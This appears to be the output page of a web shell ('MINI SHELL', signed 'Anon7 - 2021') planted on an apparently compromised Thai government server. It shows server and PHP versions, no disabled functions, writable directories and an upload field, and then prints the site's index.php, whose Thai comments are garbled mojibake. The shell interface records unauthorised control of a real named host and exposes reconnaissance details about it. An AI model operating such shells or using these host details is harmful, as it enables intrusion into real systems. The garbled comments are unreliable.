MINI SHELL

Server : Apache/2.2.2 (Fedora)
System : Linux App1.pathumtani.go.th 2.6.20-1.2320.fc5smp #1 SMP Tue Jun 12 19:40:16 EDT 2007 i686
User : apache ( 48)
PHP Version : 5.2.9
Disable Function : NONE
Directory :  /home/pathumthani_integration/integration/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Current File : //home/pathumthani_integration/integration/index.php
<?
	##¡Ó˹´ ¤èҢͧ ·ÕèÍÂÙèâ»Ãá¡ÃÁ
	define('DIR_PROGRAM', 'D:/Appserv/www/face_access');
	##URL ËÅÑ¡ ¢Í§ â»Ãá¡ÃÁ
  	define('URL_APPLICATION', 'http://127.0.0.1/face_access');
	
	
	include(DIR_PROGRAM."/config/defineDatabase.php");		// ¡Ó˹´¤èÒ connect °Ò¹¢éÍÁÙÅ 
	include(DIR_PROGRAM."/common/classIndex.php");	// àÃÕ¡ä¿Åì class php ¢Í§Êèǹ¡ÅÒ§ ÁÒãªé§Ò¹
	
	// Include ezSQL core
	include_once DIR_PROGRAM."/common/classDB/shared/ez_sql_core.php";

	// Include ezSQL database specific component
	include_once DIR_PROGRAM."/common/classDB/mysql/ez_sql_mysql.php";

	// Initialise database object and establish a connection
	// at the same time - db_user / db_password / db_name / db_host
	// ËÒ¡µéͧ¡Òä͹à¹çµä»·Õè´éÒµéÒàºÊ¡é͹Í×è¹ ãËéÊÃéÒ§ä¿Åì define ÊÓËÃѺ App ¢Öé¹ÁÒãËÁè 
	$db = new ezSQL_mysql(DB_SERVER_USERNAME,DB_SERVER_PASSWORD,DB_DATABASE,DB_SERVER);
	$sp = new classSapphire();
	echo $sp ->redirect("application/face_members/index.php",0); 
?>

Anon7 - 2021